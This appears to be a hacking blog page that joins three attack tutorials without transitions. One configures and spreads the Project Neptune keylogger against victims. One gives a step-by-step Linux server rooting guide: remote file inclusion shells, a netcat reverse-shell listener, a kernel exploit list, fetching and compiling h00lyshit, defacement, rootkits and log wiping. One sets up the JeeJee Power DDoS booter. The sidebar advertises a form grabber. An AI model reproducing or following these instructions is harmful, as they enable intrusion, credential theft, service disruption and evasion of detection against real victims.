Tuesday, September 24, 2013

Hello!
Guys!!!!!! so lets try something old in a new way :)

Now that that's out of the way, to the tutorial!


- Download Information -
Download link: http://www.project-neptune.net/download/


What exactly makes this keylogger so special?
Simply put, it is one of the most stable, well put together, and all around well written loggers around. It pays attention to the minor details and offers plenty of features.

- Tutorial -

Step One - Downloading
First off, make sure you go to the link above to download it. You will need WinRar to extract it.
After you have downloaded Project Neptune, simply drag and drop the folder containing all the files to your desktop, like shown:

[Image: 66944008.png]
---
Step Two - Setting Up Log Storing
First off, you have to decide what you want to use to store logs. For email, I recommend using Gmail, and you can make an account for that here:https://www.google.com/accounts/NewAccount?service=mail

This tutorial will be using Email, specifically Gmail, but if you want to use FTP, using DriveHQ, it's free and allows a lot of storage: http://www.drivehq.com/secure/FreeSignup.aspx

After you are done making your Gmail account, take a look at the picture below:

[Image: 48011075.png]
---
Step Three - Setting Up System Settings
There isn't much to do on this tab, but I'll give a small explanation on what it all does:

[Image: 17353496.png]

Number 1 - These options simply disable taskmanager's ability to end your server's process. If you activate any, choose the last one, it has the smallest suspicion level!

Number 2 - This is for blocking websites, but be weary, because it requires admin rights and will crash if it doesn't have it. Right click on the box to add sites.

Number 3 - All of these options are self explanatory, but be warned: they require admin rights and will cause the server to crash if the client doesn't have admin rights. Mouse over them for more information.
---
Step Four - Installation Settings

This tab is for setting up how your keylogger gets installed on your client. You need to melt your file so that it won't get tampered with after it is ran. This is just a safety feature if you'll be infecting intelligent people, but I always use it!

[Image: 61051854.png]
---
Step Five - Extra Options

These are all of those extra options that just make it more exciting. Use the Fake Error Message if you don't want to bind it to something/crypt it.

[Image: 83361732.png]
---
Step Six - Server Generation
This is the last step!

Click on the "Server Generation" tab and go ahead and copy down the Uninstall password - you'll need this if you ever test PN out on your computer. After that, go ahead and hit "Generate New Server" and you're set to go!

Now that you are done, your server file should be generated if everything went ok. If you have any questions, feel free to ask.

Protip: Click on the next tab and hit "Save Settings" so that you don't have to enter all of this every time you use it!
You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57, or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)
——————————————————————————
The purpose of this tutorial is to give a very general picture in process of Rooting
a Linux Server with Safe Mod: OFF.
-
Suppose that we have found a site with R.F.I. vulnerability:
http://www.hackedsite.com/folder/index.html?page=
We can run shell exploiting Remote File Inclusion, as follows:
http://www.hackedsite.com/folder/ind…/yourshell.txt
The “yourshell.txt” will be your remote shell.. The reason why we add a “?” at the end of the “.txt” is so the server will read it as a PHP File.. and not a normal text file.
After we enter in the shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname – a in Command line.
To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.
We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder
In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).
Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:
We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.
We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:
e.g.
cd C:\Program Files\Netcat
And we type the following command:
nc -n -l -v -p 11457
NetCat respond: listening on [any] 11457 …
In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (My IP is 94.228.220.186 – Quick and Easy way to SEE my IP address – CmyIP.com to see our ip if
we have dynamic)
In the Port form we will put the port that we opened and NetCat listens.
If we press connect the shell will respond:
Now script try connect to port 11457 …
If our settings are correct NetCat will give us a shell to the server
Now we wil continue to the Rooting proccess.
We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don’t have the correct permissions.
List of the exploits/kernel:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.
Some sites that we can find Local Root Exploits:
http://www.milw0rm (Try Search: “linux kernel”)
Other sites: .:[ packet storm ]:. – http://packetstormsecurity.org/ | arblan.com – arb lan Resources and Information.
or try Googlin’ you can find ‘em all 
We can find writable folders/files by typing:
find / -perm -2 -ls
We can use the /tmp folder which is a standard writable folder
We type: cd /tmp
To download the local root exploit we can use a download command for linux like
wget.
For example:
wget arblan.com – arb lan Resources and Information.
where arblan.com – arb lan Resources and Information. is the url of h00lyshit.
After the download we must compile the exploit (Read the instruction of the exploit
before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
Now we have created the executable file: h00lyshit.
The command to run this exploit is:
./h00lyshit
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
We must wait 2-3 minutes for the file creation
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
whoami
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.
Congratulations, You’ve got root!
This tutorial will teach you how to maintain and create your own stresser, otherwise known as a booter. I have another tutorial on this. This tutorial is updated, more detailed, and gives an even better source. Please leave feedback, or questions, or even if you think I should add something in, please don't hesitate.

[Image: jW2mxjejiQxR6.png]

1. Introduction (Sector 1)
2. Uploading Your Files (Sector 1)
3. Uploading and Configuring MySQL Databases (Sector 1)
4. Mandatory File Edits (Sector 1)
5. Configuring PhpMyAdmin (Sector 2)
6. Accounts (Sector 3)
7. Creating An Account (Sector 3)
8. Activating Your Account and Making Yourself an Administrator (Sector 3
9. Accessing the Administrator Control Panel (Sector 3)
10. Sells/APi's (Sector 4)


[Image: j3Kqy0dUN0MNg.png]

So. You may be this far, but you may not know what a stresser, or "booter" even is. A stresser uses shells or api's to attack a certain location. These will send a certain amount of packets to the desired location, and if it sends enough packets it will force the server, or connection to flood, and simply crash. When a router, or connection/network crashes, that server cannot handle the amount of incoming packets.

[Image: jLVyWBEP1gdZK.png]

JeeJee Power v1.0 Source:

http://www.mediafire.com/?pbe1debx2hd8qg7

Shell Checker:

http://www.mediafire.com/?du52p5rlfdm5ura

Introduction (Sector 1):

Note: Please note I have spoilered image to have bandwidth. Click view spoiler to view tutorial related images! Thank you. -Natha.

Welcome to Sector One of this tutorial. In this stage I will be teaching you the following:

  • How to setup your hosting.
  • How to upload and configure your stresser.

Uploading Your Files (Sector 1):

1. For tutorial purposes I'm simply going to use a hosting website called http://000webhosting.com/ I would not advise using this website, you will not be able to send attacks. They have fsock disabled. As I said, this site is just for tutorial purposes. I would advise getting cheap hosting here at HackForums in the hosting marketplace.

Once you have your hosting, you will want to upload your files that you originally downloaded above. ONLY upload the files within the source folder included in the download. There is no point uploading the banner .PSD etc.

To upload your files download filezilla at http://www.filezilla-project.org/ or use the file manager in your hosting's cPanel.

Uploading and Configuring MySQL Databases (Sector 1):

Once you have your files uploaded. Go into your cPanel and create a MySQL database.

The majority of hosts, if not all will all come with MySQL installed.

Create your database. Remember the information used. 

After your database has been created, we now want to edit three files. The three files are below:

Mandatory File Edits (Sector 1):

We need to edit the files so our stresser can connect to the MySQL Database.

  • dbc.php
  • shellcounter.php
  • includes/ezSQL.php ( line 44, 71 and 101 )

dbc.php:

This is self explanatory. At the top you will see the lines below. The lines below explain exactly what to edit. Edit the information within the ' 's. Like I have done below.

PHP Code:
define ("DB_HOST", "mysql9.000webhost.com"); // set database hostdefine ("DB_USER", "a9162705_xx"); // set database userdefine ("DB_PASS","Example1"); // set database passworddefine ("DB_NAME","a9162705_xx"); // set database name 

Line 1: This is your database host.
Line 2: This is your database username.
Line 3: This is your database password.
Line 4: This is your database name.

If you haven't caught on by now. You need to input all of your MySQL information into those fields. 

shellcounter.php:

The top of shellcounter.php will look like this:

PHP Code:
/* START OF CONFIGURATION SECTION */$mysql_username = 'a9162705_xx';    // MySQL User Name$mysql_password = 'Example1';  // MySQL Password$mysql_hostname = 'mysql9.000webhost.com';    // MySQL Host Name$mysql_hostport = 3306;  // MySQL Host Port$mysql_database = 'a9162705_xx';    // MySQL Database$mysql_shelltbl = 'shellpool';    // MySQL Table Name (will be created if it does not exist)$mysql_stengine = 'MyISAM';    // Preferred MySQL Storage Engine (MyISAM, MRG_MyISAM or InnoDB) 

You will only need to edit the following with your MySQL Database Information:

PHP Code:
$mysql_username = 'a9162705_xx';    // MySQL User Namemysql_password = 'Example1';  // MySQL Password$mysql_hostname = 'mysql9.000webhost.com';    // MySQL Host Name$mysql_database = 'a9162705_xx';    // MySQL Database 

LEAVE everything else as is. Ports for example, leave them. They're fine.

ezSQL.php:

I would recommend getting Notepad++. Download it at, http://notepad-plus-plus.org/ to navigate line numbers easier. Read above for the lines that need to be edited.

Line 44:

Edit the obvious fields. I've inputted my database information.

PHP Code:
function ezSQL_mysql($dbuser='a9162705_xx', $dbpassword='Example1', $dbname='a9162705_xx', $dbhost='mysql9.000webhost.com') 

Line 71:

Once again, edit the obvious fields. Look at the $values. It explains it clearly. $dbuser is the database username, and so on. Common sense.

PHP Code:
        function connect($dbuser='a9162705_xx', $dbpassword='Example1', $dbhost='mysql9.000webhost.com') 

Line 101:

Finally for a short one, line 101, just the database name.

PHP Code:
        function select($dbname='a9162705_xx') 

Configuring PhpMyAdmin (Sector 2):

Welcome to Sector 2 of this tutorial. This will teach you how to configure your PhpMyAdmin with your stresser source. Please don't over think this. It may seem overwhelming, but it's incredibly simple.

Your cPanel should have PhpMyAdmin. 

Locate the import button located at the top of PhpMyAdmin:


[Image: ibnSppRtGxLUlX.png]

Once you're in the import menu. Upload the provided .SQL file in the JeeJee Power folder. Like below:


[Image: ibzIoagF1p74n6.png]

Then after click "Go" like provided below.


[Image: iRWQMzyV6Y1I9.png]

Then you should get a success message, and the databases should appear on the side.

Accounts (Sector 3):

Welcome to Sector 3 of this tutorial! In this sector we will be learning how to register our account, activate it, and then proceed to give our self administrator rights, and access to the AdminCP.

You will want to locate YOURDOMAIN.com/login.php (Of course replace YOURDOMAIN with your actual domain, as this is just an example).

Creating An Account (Sector 3):

You will now be at the login page like below. (IF you get a MySQL error, you have input your MySQL details to the edited pages incorrectly).


[Image: ifPxE7PWOumN4.png]

Click the register button, and register your account.


[Image: i7W9kRZto6bPu.png]

Now your account is registered! Congratulations.

We're not done yet!


[Image: iCub0oXuOHsKI.png]

Activating Your Account and Making Yourself an Administrator (Sector 3):

Now go back to PhpMyAdmin.

Click the table called 'Users' on the side and then click Browse button at the top, just like when you clicked import. 


[Image: itDujnSFYjH1c.png]

You should see your own profile:


[Image: 1VKOC]

You want to click edit, which is of course the little pencil button. 

You need to change the values. Change the user_level value to 5. This will make an you administrator. Then you want to change the approved value from 0 to 1 to approve your account. 

Congratulations, your account is now active, and you're an administrator!


[Image: iYeDbww90WtHe.png]

Accessing the Administrator Control Panel (Sector 3):

To go to the administrator's control panel go to YOURDOMAIN.com/admin.php (Obviously replace YOURDOMAIN.com with your own once again).

From here you can change your booters name, add shells, post new bulletins, read logs, create users, active users and more!

Shells/APi's (Sector 4):

Ok. So you're finished, you want to get going right? Right. Unfortunately, this is the hard part. Well, easy but then again frustrating and can be time consuming. 

You need shells or APi's for your booter/stresser to work

adf popup

adf

MY SKYPE

Powered by Blogger.

Random Posts

Featured Post

Form Grabber Released Works With IE,CROME and FIREFOX ,Unicode support [ 14-02-2016]

Hello guys! here i am releasing My form grabber Today, i have been coding this for oven 6 months and finally its time for public sales.....

Followers

Recent in Culture

News

Lorem 1

Pages

Popular Posts

Popular Posts